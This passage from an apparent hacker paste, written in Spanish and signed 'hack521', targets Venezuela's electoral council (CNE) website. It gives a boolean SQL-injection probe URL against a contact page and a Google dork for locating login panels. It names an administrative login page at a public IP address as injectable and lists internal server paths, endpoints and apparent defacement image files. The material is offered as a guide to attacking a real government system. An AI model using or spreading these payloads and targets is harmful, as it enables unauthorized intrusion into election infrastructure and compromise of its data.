  73. http://www.cne.gob.ve/web/registro_electoral/contactenos.php?n=V&ce=1112222+and+111=1111111111111111111111111111111111111111111111111111111111111111111111111111111
  74.  
  75. muchas cosas se pueden lograr gracias a ella.
  76. -----------------------------------------------------------
  77. ¿cual otra?
  78.  
  79. ir a google y colocar: site:cne.gob.ve inurl:"login="
  80.  
  81. su panel de acceso..
  82.  
  83. el panel numero 2 se encuentra en https://200.109.120.13/usuario/login.php
  84.  
  85. el cual es vulnerable... con inyect sql.
  86.  
  87. info de extra:
  88. -----------------------------------------------------------
  89. http://www.cne.gob.ve/web/media/fotos/news/aplaudiendo.gif
  90. https://200.109.120.13/web/media/fotos/news/thumbs/Hacker.gif
  91. https://200.109.120.13/web/media/fotos/news/thumbs/aplaudiendo.gif
  92. http://www.cne.gob.ve/web/media/fotos/news/Hacker.gif
  93. /www/cluster/cneweb/web/clases/prensa/Medio.php
  94. https://200.109.120.13/prensa/medio_consultar-2.php?noencab=2
  95. https://200.109.120.13/prensa/medio_consultar-4.php?el_path=2011&id=882
  96. https://200.109.120.13/usuario/login.php
  97. https://andromeda.cne.gob.ve/financiamiento2010/usuario/login.php
  98. https://200.109.120.13/web/media/fotos/2011/thumbs/
  99. ---------------
  100.  
  101. Atentamente: hack521 :=)